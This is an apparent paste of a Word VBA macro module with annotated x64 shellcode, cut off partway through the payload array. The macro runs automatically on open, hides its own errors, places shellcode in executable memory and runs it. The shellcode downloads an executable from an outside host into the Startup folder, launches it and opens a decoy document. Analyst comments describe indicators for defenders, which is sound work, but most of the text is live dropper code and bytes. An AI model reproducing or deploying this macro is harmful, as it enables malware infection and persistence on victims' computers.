
Untitled

a guest
Dec 23rd, 2018
  1. Attribute VB_Name = "NewMacros"
      ' Win32 imports used by AutoOpen in this module. Together they give the macro
      ' everything needed to place raw machine code in memory and start it:
      ' allocate (VirtualAlloc), copy (RtlMoveMemory), run (_beginthread).
      ' For triage: a document macro that declares an allocator, a raw memory copy
      ' and a thread-start routine is a strong static indicator on its own, whatever
      ' the alias names are.
      '
      ' "SharpShooter" is only a local alias; the real export is msvcrt!_beginthread.
      ' AutoOpen passes the VirtualAlloc result as StartAddress.
      ' NOTE(review): the alias and the variable rising_sun used later resemble names
      ' from public reporting on a late-2018 campaign; this listing alone does not
      ' establish attribution.
  2. Private Declare PtrSafe Function SharpShooter Lib "msvcrt" Alias "_beginthread" (ByVal StartAddress As LongPtr, StackSize As Long, ByVal ArgList As LongPtr) As Long
      ' Called once in AutoOpen with aloctype &H1000 and fprot &H40.
  3. Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" Alias "VirtualAlloc" (ByVal address As Long, ByVal size As Long, ByVal aloctype As Long, ByVal fprot As Long) As LongPtr
      ' src is ByRef As Any, so the callee receives the address of whatever variable
      ' is passed; AutoOpen relies on that to copy the bytes of a variable's value.
  4. Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal dest As LongPtr, ByRef src As Any, ByVal dlen As Long) As LongPtr
      ' LoadLibraryA / GetProcAddress are used in AutoOpen to look up the in-process
      ' addresses of those same two functions, which are then written into the payload.
  5. Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" Alias "LoadLibraryA" (ByVal libname As String) As LongPtr
  6. Private Declare PtrSafe Function GetProcAddress Lib "kernel32" Alias "GetProcAddress" (ByVal module As LongPtr, ByVal pname As String) As LongPtr
  7. '``````````````````````````````````````````````````````````````````````````````````
  8. Sub AutoOpen()
      ' AutoOpen is the macro name Word runs automatically when the document is
      ' opened with macros enabled, so no further user action is needed after that.
      ' Any runtime error jumps to the label LoneSpirit, which is immediately followed
      ' by End Sub: failures are swallowed silently and the user sees no error dialog.
  9. On Error GoTo LoneSpirit
  10. '``````````````````````````````````````````````````````````````````````````````````
  11.  
  12. Dim BlockCount As Long, size_count As Long
      ' Number of Array() chunks the payload is split into: shellcode(0)..shellcode(2).
  13. BlockCount = 3
      ' This initial value is not used as written: size_count is reset to 0 before the
      ' copy loop and from then on counts the bytes placed in binbuffer.
  14. size_count = 3224
  15. Dim shellcode(2) As Variant
      ' Byte staging buffer, indices 0..3224.
  16. Dim binbuffer(3224) As Byte
      ' ---- Analyst summary of the payload held in the Array() literals that follow ----
      ' The bytes are x64 machine code; the first instruction is 48 81 EC D8 04 00 00
      ' (sub rsp, 0x4D8). Strings are built on the stack one byte at a time
      ' (C6 84 24 <off32> <imm8> / C6 44 24 <off8> <imm8> = mov byte [rsp+off], imm8),
      ' so none of them appear as contiguous text in the document.
      ' Strings decoded from the imm8 values:
      '   DLL names : urlmon.dll, shfolder.dll, ntdll.dll, kernel32.dll, shell32
      '   API names : URLDownloadToFileA, SHGetFolderPathA, strcpy, strcat,
      '               CreateProcessA, memset, ShellExecuteA (plus LoadLibraryA and
      '               GetProcAddress as strings)
      '   URL 1 (defanged): hxxps://www[.]kingkoil[.]com[.]sg/query.php
      '   File 1          : \mssync.exe
      '   URL 2 (defanged): hxxps://www[.]kingkoil[.]com[.]sg/Strategic Planning Manager.doc
      '   File 2          : \Strategic Planning Manager.doc
      '   Verb            : open
      ' Behaviour as read from the disassembly (confirm in a disassembler before
      ' relying on it): SHGetFolderPathA is called with folder id 7 (CSIDL_STARTUP)
      ' and "\mssync.exe" is appended; it is called again with id 0x1C
      ' (CSIDL_LOCAL_APPDATA) and the .doc name is appended. URL 1 is fetched to the
      ' first path with URLDownloadToFileA and, if the call does not fail, that path
      ' is passed to CreateProcessA. URL 2 is then fetched to the second path and
      ' passed to ShellExecuteA with the "open" verb.
      ' The two mov rax, imm64 instructions carrying DE AD 88 88 88 88 88 81 / ..82
      ' look like the placeholders that AutoOpen overwrites at buffer offsets 1265
      ' and 1283 with the LoadLibraryA and GetProcAddress addresses.
      ' Hunting pivots: mssync.exe in a user's Startup folder; the host and the two
      ' URL paths above in proxy/DNS logs; WINWORD.EXE loading urlmon.dll and then
      ' creating a child process; a private RWX region of about 3 KB in WINWORD.EXE.
  17.  
  18. shellcode(0) = Array(&H48, &H81, &HEC, &HD8, &H4, &H0, &H0, &HC6, &H84, &H24, &HC8, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, &HC9, &H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HCA, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HCB, &H1, &H0, &H0, &H6D, &HC6, &H84, &H24, &HCC, &H1, &H0, &H0, &H6F, &HC6, &H84, &H24, &HCD, &H1, &H0, &H0, &H6E, &HC6, &H84, &H24, &HCE, &H1, &H0, &H0, &H2E, &HC6, &H84, &H24, &HCF, &H1, &H0, &H0, &H64, &HC6, &H84, &H24, &HD0, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD1, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD2, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &HB0, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HB1, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HB2, &H3, &H0, &H0, &H66, &HC6, &H84, &H24, &HB3, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HB4, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, _
  19. &HB5, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HB6, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HB7, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB8, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HB9, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HBA, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBC, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H70, &H6E, &HC6, &H44, &H24, &H71, &H74, &HC6, &H44, &H24, &H72, &H64, &HC6, &H44, &H24, &H73, &H6C, &HC6, &H44, &H24, &H74, &H6C, &HC6, &H44, &H24, &H75, &H2E, &HC6, &H44, &H24, &H76, &H64, &HC6, &H44, &H24, &H77, &H6C, &HC6, &H44, &H24, &H78, &H6C, &HC6, &H44, &H24, &H79, &H0, &HC6, &H84, &H24, &H20, &H4, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H22, &H4, &H0, &H0, &H72, &HC6, &H84, _
  20. &H24, &H23, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &H24, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H25, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H26, &H4, &H0, &H0, &H33, &HC6, &H84, &H24, &H27, &H4, &H0, &H0, &H32, &HC6, &H84, &H24, &H28, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H2A, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2B, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2C, &H4, &H0, &H0, &H0, &HC6, &H44, &H24, &H60, &H73, &HC6, &H44, &H24, &H61, &H68, &HC6, &H44, &H24, &H62, &H65, &HC6, &H44, &H24, &H63, &H6C, &HC6, &H44, &H24, &H64, &H6C, &HC6, &H44, &H24, &H65, &H33, &HC6, &H44, &H24, &H66, &H32, &HC6, &H44, &H24, &H67, &H0, &HC6, &H84, &H24, &HD8, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HD9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, _
  21. &HDA, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HDB, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HDC, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HDD, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HDE, &H3, &H0, &H0, &H62, &HC6, &H84, &H24, &HDF, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE0, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HE1, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE2, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &HE3, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HE4, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H10, &H4, &H0, &H0, &H47, &HC6, &H84, &H24, &H11, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H12, &H4, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H4, &H0, &H0, &H50, &HC6, &H84, &H24, &H14, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H15, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &H16, _
  22. &H4, &H0, &H0, &H63, &HC6, &H84, &H24, &H17, &H4, &H0, &H0, &H41, &HC6, &H84, &H24, &H18, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H19, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H1A, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H1B, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H1C, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1D, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1E, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H98, &H3, &H0, &H0, &H55, &HC6, &H84, &H24, &H99, &H3, &H0, &H0, &H52, &HC6, &H84, &H24, &H9A, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &H9B, &H3, &H0, &H0, &H44, &HC6, &H84, &H24, &H9C, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H9D, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H9E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H9F, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA0, &H3, _
  23. &H0, &H0, &H6F, &HC6, &H84, &H24, &HA1, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HA2, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HA3, &H3, &H0, &H0, &H54, &HC6, &H84, &H24, &HA4, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HA5, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &HA6, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HA7, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA8, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HA9, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HAA, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H50, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H51, &H3, &H0, &H0, &H48, &HC6, &H84, &H24, &H52, &H3, &H0, &H0, &H47, &HC6, &H84, &H24, &H53, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H54, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H55, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &H56, &H3, &H0, _
  24. &H0, &H6F, &HC6, &H84, &H24, &H57, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H58, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H59, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H5A, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H5B, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H5C, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H5D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H5E, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H5F, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H60, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H58, &H73, &HC6, &H44, &H24, &H59, &H74, &HC6, &H44, &H24, &H5A, &H72, &HC6, &H44, &H24, &H5B, &H63, &HC6, &H44, &H24, &H5C, &H70, &HC6, &H44, &H24, &H5D, &H79, &HC6, &H44, &H24, &H5E, &H0, &HC6, &H84, &H24, &HB8, &H1, &H0, &H0, &H73, &HC6, &H84, &H24, &HB9, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBA, _
  25. &H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HBB, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HBC, &H1, &H0, &H0, &H61, &HC6, &H84, &H24, &HBD, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBE, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &H88, &H3, &H0, &H0, &H43, &HC6, &H84, &H24, &H89, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H8A, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8B, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8C, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H8D, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8E, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H8F, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H90, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H91, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H92, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H93, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H94, &H3, _
  26. &H0, &H0, &H73, &HC6, &H84, &H24, &H95, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H96, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H50, &H6D, &HC6, &H44, &H24, &H51, &H65, &HC6, &H44, &H24, &H52, &H6D, &HC6, &H44, &H24, &H53, &H73, &HC6, &H44, &H24, &H54, &H65, &HC6, &H44, &H24, &H55, &H74, &HC6, &H44, &H24, &H56, &H0, &HC6, &H84, &H24, &HA8, &H1, &H0, &H0, &H53, &HC6, &H84, &H24, &HA9, &H1, &H0, &H0, &H68, &HC6, &H84, &H24, &HAA, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HAB, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAC, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAD, &H1, &H0, &H0, &H45, &HC6, &H84, &H24, &HAE, &H1, &H0, &H0, &H78, &HC6, &H84, &H24, &HAF, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB0, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HB1, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, _
  27. &HB2, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HB3, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB4, &H1, &H0, &H0, &H41, &HC6, &H84, &H24, &HB5, &H1, &H0, &H0, &H0, &H48, &HB8, &H81, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &H80, &H0, &H0, &H0)
  28. shellcode(1) = Array(&H48, &HB8, &H82, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &HA0, &H1, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H98, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H68, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H50, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H58, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC0, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, _
  29. &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HB8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H70, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H88, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H68, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H50, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H60, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HA8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, _
  30. &H0, &H48, &H89, &H84, &H24, &HC0, &H3, &H0, &H0, &HC6, &H84, &H24, &HE8, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HE9, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEA, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEB, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &HEC, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HED, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &HEE, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HEF, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HF0, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF1, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF2, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF3, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HF4, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF5, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HF6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &HF7, &H3, &H0, &H0, &H67, _
  31. &HC6, &H84, &H24, &HF8, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFA, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HFB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFC, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HFD, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HFE, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFF, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H0, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H2, &H4, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H4, &H0, &H0, &H2F, &HC6, &H84, &H24, &H4, &H4, &H0, &H0, &H71, &HC6, &H84, &H24, &H5, &H4, &H0, &H0, &H75, &HC6, &H84, &H24, &H6, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H7, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H8, &H4, &H0, &H0, &H79, &HC6, _
  32. &H84, &H24, &H9, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &HA, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HB, &H4, &H0, &H0, &H68, &HC6, &H84, &H24, &HC, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HD, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H78, &H3, &H0, &H0, &H5C, &HC6, &H84, &H24, &H79, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H7A, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7B, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7C, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &H7D, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7E, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H7F, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H80, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H81, &H3, &H0, &H0, &H78, &HC6, &H84, &H24, &H82, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H83, &H3, &H0, &H0, &H0, &H48, &H8D, _
  33. &H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H7, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &H78, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HE0, &H1, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &HC6, &H84, &H24, &H10, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H11, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H12, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &H14, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H15, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &H16, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H17, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H18, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H19, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, _
  34. &H1A, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H1B, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1C, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H1D, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H1F, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H20, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H22, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H23, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H24, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H25, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H26, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H27, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H28, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H2A, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H2B, _
  35. &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H2C, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H2D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H2E, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H2F, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H30, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H31, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H32, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H33, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H34, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H35, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H36, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H37, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H38, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H39, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3A, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3B, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H3C, &H3, _
  36. &H0, &H0, &H6E, &HC6, &H84, &H24, &H3D, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3E, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H3F, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H40, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H41, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H42, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H43, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H44, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H45, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H46, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H47, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H48, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H49, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H4A, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &HF0, &H2, &H0, &H0, &H5C, &HC6, &H84, &H24, &HF1, &H2, &H0, &H0, &H53, &HC6, &H84, &H24, &HF2, &H2, &H0, _
  37. &H0, &H74, &HC6, &H84, &H24, &HF3, &H2, &H0, &H0, &H72, &HC6, &H84, &H24, &HF4, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HF5, &H2, &H0, &H0, &H74, &HC6, &H84, &H24, &HF6, &H2, &H0, &H0, &H65, &HC6, &H84, &H24, &HF7, &H2, &H0, &H0, &H67, &HC6, &H84, &H24, &HF8, &H2)
  38. shellcode(2) = Array(&H0, &H0, &H69, &HC6, &H84, &H24, &HF9, &H2, &H0, &H0, &H63, &HC6, &H84, &H24, &HFA, &H2, &H0, &H0, &H20, &HC6, &H84, &H24, &HFB, &H2, &H0, &H0, &H50, &HC6, &H84, &H24, &HFC, &H2, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFD, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HFE, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &HFF, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &H0, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H2, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H4, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H5, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H9, &H3, &H0, &H0, _
  39. &H65, &HC6, &H84, &H24, &HA, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HC, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HD, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HE, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HF, &H3, &H0, &H0, &H0, &H48, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H1C, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HF0, &H2, &H0, &H0, &H48, &H8D, &H8C, &H24, &H90, &H0, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HE8, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, _
  40. &H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &HF, &H8C, &HA1, &H0, &H0, &H0, &HC7, &H84, &H24, &H50, &H4, &H0, &H0, &H68, &H0, &H0, &H0, &HC7, &H84, &H24, &H8C, &H4, &H0, &H0, &H1, &H0, &H0, &H0, &H33, &HC0, &H66, &H89, &H84, &H24, &H90, &H4, &H0, &H0, &H41, &HB8, &H68, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H50, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H41, &HB8, &H18, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H30, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H84, &H24, &H30, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H48, &H48, &H8D, &H84, &H24, &H50, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H40, &H48, &HC7, &H44, &H24, &H38, &H0, &H0, &H0, &H0, &H48, _
